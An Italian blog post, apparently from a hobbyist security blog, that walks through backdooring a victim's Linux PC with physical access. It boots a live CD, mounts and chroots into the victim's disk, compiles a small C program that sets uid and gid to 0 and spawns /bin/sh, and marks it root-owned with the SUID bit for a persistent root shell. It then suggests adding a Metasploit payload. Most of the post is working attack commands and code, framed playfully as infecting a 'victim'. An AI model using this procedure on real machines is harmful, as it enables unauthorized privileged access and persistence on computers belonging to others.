Infettare una distribuzione GNU/Linux se si ha accesso fisico al pc è una cosa decisamente semplice.
Noi vedremo come crearci una shell per eseguire comandi root senza cambiare la password a quest’ultimo.
Per fare questo ho utilizzato la live cd di backbox, perchè veloce nel boot ma possiamo utilizzare qualsiasi distribuzione linux come deft,backtrack ma la più consigliata è system rescue.
La scelta più consigliata ricade su system rescue perchè ci permette al boot della live di scegliere un kernel a 32 bit o 64bit a seconda della architettura che abbiamo sul pc vittima.
La prima cosa da fare è avviare la live cd, una volta avviata diventiamo root:
su root
Visualizziamo i dischi presenti:
fdisk -l
Es di output:
/dev/sda1 * 1 14219 114214086 83 Linux /dev/sda2 14220 14593 3004155 5 Extended /dev/sda5 14220 14593 3004123+ 82 Linux swap / Solaris
Perciò il disco su cui è installato linux è:
/dev/sda1
Montiamo il disco linux in una directory temporanea:
mkdir disk
Montiamo:
mount /dev/sda1 disk
Diventiamo root nel sistema del pc vittima :D
chroot disk
Se dovessimo incorrere in errori, esempio:
chroot: cannot run command `/bin/zsh’: No such file or directory
Digitiamo:
chroot disk /bin/bash
o
chroot disk /bin/sh
Ora andiamo a fare un salto nella nostra home :D
cd home/USERNAME/
Bene creiamo in nostro piccolo rootkit :D
Wikipedia:
A rootkit is a stealthy type of malicious software (malware) designed to hide the existence of certain processes or programs from normal methods of detection and enables continued privileged access to a computer.
The term rootkit is a concatenation of “root” (the traditional name of the privileged account on Unix operating systems) and the word “kit” (which refers to the software components that implement the tool).
nano rootkit.c
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
Compiliamo:
gcc rootkit.c -o rootkit
Diamo i permessi giusti ehehe :D
chown root.root rootkit
Ehehe:
chmod 4755 rootkit
Usciamo:
exit
Riavviamo il pc:
reboot
Adesso avviamo il pc normalmente apriamo il terminale:
cd $HOME
e avviamo il rootkit :D
./rootkit
Digitiamo chi siamo:
# whoami root #
Ora potremo installarci un bel payload di metasploit, un servizio linux ecc ecc ecc :D
Altro da sapere:
SUID(Set User Identification).
Impostando questa modalità su un file si fa in modo che chiunque esegua quel file ottiene gli stessi privilegi dell’utente proprietario.
Per ragioni di sicurezza, bisogna prestare molta attenzione quando un file proprietà dell’utente “root” ha il permesso SUID attivato.
Attivare il bit SUID.
chmod 4755 FILE
Disattivare il bit SUID.
chmod 0755 FILE
Buon divertimento :D
Pingback: [Linux]:Attacco bruteforce per recupero password sul file /etc/shadow | ClsHack:Computer Security Blog